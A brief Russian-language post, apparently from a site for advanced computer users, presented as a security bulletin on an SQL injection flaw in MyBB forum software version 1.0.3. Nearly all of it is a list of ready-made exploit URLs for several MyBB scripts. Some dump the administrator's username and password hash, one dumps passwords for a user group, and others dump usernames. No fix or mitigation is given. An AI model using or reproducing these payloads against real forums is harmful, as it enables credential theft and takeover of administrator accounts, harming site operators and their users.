Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в MyBB.
Компьютер для продвинутых
пользователей
Содержание:
MyBB
ПО: MyBB
Версия: 1.0.3
Использование: SQL-инъекции.
Похищение имени пользователя для администратора:
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
Похищение пароля для администратора:
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
Ну, и просто работа с пользователями:
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*